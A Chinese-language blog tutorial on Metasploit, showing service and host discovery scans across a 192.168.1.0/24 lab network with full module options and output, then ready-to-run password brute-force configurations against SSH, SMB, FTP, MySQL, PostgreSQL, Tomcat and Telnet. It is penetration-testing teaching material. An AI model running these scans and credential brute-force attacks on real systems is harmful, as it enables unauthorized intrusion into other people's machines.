Metasploit服务扫描与爆破

发表于 2019-03-20 更新于 2022-12-19 分类于渗透与网络安全本文字数： 14k

MSF服务发现

MSF 服务发现

常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等.

MSF模块搜索:

[root@localhost ~]# msfconsole
msf5 > search scanner type:auxiliary
msf5 > search scanner/http type:auxiliary        // 搜索所有与HTTP相关的模块

发现HTTP服务: 基于scanner/http/http_version发现HTTP服务.

msf5 > use scanner/http/http_version
msf5 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host


msf5 auxiliary(scanner/http/http_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/http/http_version) > set rport 80
rport => 80

msf5 auxiliary(scanner/http/http_version) > exploit
[+] 192.168.1.7:80 Apache/2.4.6 (CentOS) PHP/5.4.16 ( Powered by PHP/5.4.16, 302-login.php )
[+] 192.168.1.3:80 Apache/2.5.0 (CentOS) PHP/7.0.0 ( Powered by PHP/7.0.0, 302-admin.php )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

发现SMB服务: 基于scanner/smb/smb_version发现SMB服务.

msf5 > use scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    10               yes       The number of concurrent threads


msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_version) > set threads 10
threads => 10

msf5 auxiliary(scanner/smb/smb_version) > exploit
[+] 192.168.1.2:445       - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark)
[*] 192.168.1.7:445       - Host could not be identified: Windows 6.1 (Samba 4.8.3)
[*] 192.168.1.0/24:445    - Scanned  26 of 256 hosts (10% complete)
[*] 192.168.1.0/24:445    - Caught interrupt from the console...
[*] Auxiliary module execution completed

发现FTP服务: 基于scanner/ftp/ftp_version发现FTP服务

msf5 > use scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > show options

Module options (auxiliary/scanner/ftp/ftp_version):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS   192.168.1.0/24       yes       The target address range or CIDR identifier
   RPORT    21                   yes       The target port (TCP)
   THREADS  10                   yes       The number of concurrent threads


msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/ftp/ftp_version) > set threads 10
threads => 10

msf5 auxiliary(scanner/ftp/ftp_version) > exploit

[+] 192.168.1.7:21        - FTP Banner: '220 (vsFTPd 3.0.2)\x0d\x0a'
[*] 192.168.1.0/24:21     - Scanned  32 of 256 hosts (12% complete)
[*] 192.168.1.0/24:21     - Caught interrupt from the console...
[*] Auxiliary module execution completed

发现SSH服务: 基于auxiliary/scanner/ssh/ssh_version发现SSH服务

msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port (TCP)
   THREADS  10               yes       The number of concurrent threads
   TIMEOUT  30               yes       Timeout for the SSH probe


msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/ssh/ssh_version) > set threads 10
threads => 10

msf5 auxiliary(scanner/ssh/ssh_version) > exploit

[+] 192.168.1.7:22        - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.1.0/24:22     - Caught interrupt from the console...
[*] Auxiliary module execution completed

发现Telnet服务: 基于auxiliary/scanner/telnet/telnet_version发现TELNET服务

msf5 > use auxiliary/scanner/telnet/telnet_version
msf5 auxiliary(scanner/telnet/telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS    192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT     23               yes       The target port (TCP)
   THREADS   10               yes       The number of concurrent threads
   TIMEOUT   30               yes       Timeout for the Telnet probe
   USERNAME                   no        The username to authenticate as


msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/telnet/telnet_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_version) > exploit

[-] 192.168.1.1:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.1:23).
[-] 192.168.1.7:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.7:23).
[-] 192.168.1.0:23        - A network issue has occurred: The host (192.168.1.0:23) was unreachable.
[-] 192.168.1.10:23       - A network issue has occurred: The connection was refused by the remote host (192.168.1.10:23).
[-] 192.168.1.3:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.3:23).
[-] 192.168.1.5:23        - A network issue has occurred: The host (192.168.1.5:23) was unreachable.
[*] 192.168.1.0/24:23     - Caught interrupt from the console...
[*] Auxiliary module execution completed

发现MySQL服务: 基于auxiliary/scanner/mysql/mysql_version发现mysql服务

msf5 > use auxiliary/scanner/mysql/mysql_version
msf5 auxiliary(scanner/mysql/mysql_version) > show options

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier
   RPORT    3306             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads


msf5 auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/mysql/mysql_version) > set rport 3306
rport => 3306
msf5 auxiliary(scanner/mysql/mysql_version) > exploit

[*] 192.168.1.7:3306      - 192.168.1.7:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.7' is not allowed to connect to this MariaDB server
[*] 192.168.1.7:3306      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

发现MSSQL服务: 基于auxiliary/scanner/mssql/mssql_ping发现SQL Server服务

msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS               192.168.1.0/24   yes       The target address range or CIDR identifier
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              10               yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/mssql/mssql_ping) > set threads 10
threads => 10

msf5 auxiliary(scanner/mssql/mssql_ping) > run

发现Oracle服务: 基于auxiliary/scanner/oracle/tnslsnr_version发现Oracle服务

msf5 > use auxiliary/scanner/oracle/tnslsnr_version
msf5 auxiliary(scanner/oracle/tnslsnr_version) > show options

Module options (auxiliary/scanner/oracle/tnslsnr_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    1521             yes       The target port (TCP)
   THREADS  10               yes       The number of concurrent threads


msf5 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/oracle/tnslsnr_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/oracle/tnslsnr_version) > run

## MSF 主机的发现

MSF提供了一些辅助模块,可以实现主机发现,这些模块位于modules/auxiliary/scanner/discovery/目录中,主要有以下几个arp_sweep,ipv6_multicast_ping,ipv6_neighbor,ipv6_neighbor_router_advertisement,udp_probe,udp_sweep,接下来主要看常用的几个模块的使用技巧.

ARP发现内网主机: 基于scanner/discovery/arp_sweep发现内网存活主机.

msf5 > use scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data


msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 10
threads => 10

msf5 auxiliary(scanner/discovery/arp_sweep) > exploit

[+] 192.168.1.1 appears to be up (UNKNOWN).
[+] 192.168.1.2 appears to be up (UNKNOWN).
[+] 192.168.1.2 appears to be up (UNKNOWN).
[+] 192.168.1.1 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

UDP发现内网主机: 基于scanner/discovery/udp_sweep发现内网存活主机.

msf5 > use scanner/discovery/udp_sweep
msf5 auxiliary(scanner/discovery/udp_sweep) > show options

Module options (auxiliary/scanner/discovery/udp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/discovery/udp_sweep) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/udp_sweep) > exploit

[*] Sending 13 probes to 192.168.1.0->192.168.1.255 (256 hosts)
[*] Discovered NetBIOS on 192.168.1.2:137 (lyshark:<20>:U :lysahrk:<00>:U :lyshark:<00>:G :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U :__MSBROWSE__:<01>:G :a4:be:c8:fe:ac:z4)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

ACK发现内网主机: 基于auxiliary/scanner/portscan/ack扫描内网存活主机.

msf5 > use auxiliary/scanner/portscan/ack
msf5 auxiliary(scanner/portscan/ack) > show options

Module options (auxiliary/scanner/portscan/ack):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds


msf5 auxiliary(scanner/portscan/ack) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/ack) > set threads 10
threads => 10

msf5 auxiliary(scanner/portscan/ack) > exploit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

SYN发现内网主机: 基于auxiliary/scanner/portscan/syn扫描内网存活主机.

msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-1024           yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/syn) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/syn) > run

TCP发现内网主机: 基于auxiliary/scanner/portscan/tcp扫描内网存活主机.

msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.1.7      yes       The target address range or CIDR identifier
   THREADS      10               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds


msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.1.7:          - 192.168.1.7:21 - TCP OPEN
[+] 192.168.1.7:          - 192.168.1.7:22 - TCP OPEN
[+] 192.168.1.7:          - 192.168.1.7:80 - TCP OPEN
[+] 192.168.1.7:          - 192.168.1.7:139 - TCP OPEN
[+] 192.168.1.7:          - 192.168.1.7:445 - TCP OPEN
[*] 192.168.1.7:          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

### MSF 服务爆破

对于发现的服务,下一个目标就是尝试爆破其登陆密码,爆破是否能够成功,这里需要有一个社工好了的字典,这里只是演示几个服务爆破的使用方法,这里只演示爆破的配置,爆破时间过长,不做具体实验.

SSH口令爆破:

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.7
set username root
set pass_file /root/pass.txt
set threads 10
exploit

Samba口令爆破:

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
set threads 10
exploit

FTP口令爆破:

use scanner/ftp/ftp_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
set threads 10
exploit

MySQL口令爆破:

search mysql
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

Postgresql口令爆破:

use auxiliary/scanner/postgres/postgres_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

Tomcat口令爆破:

search tomcat

use auxiliary/scanner/http/tomcat_mgr_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

Telnet口令爆破:

use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.1.7
set username administrator
set pass_file /root/pass.txt
exploit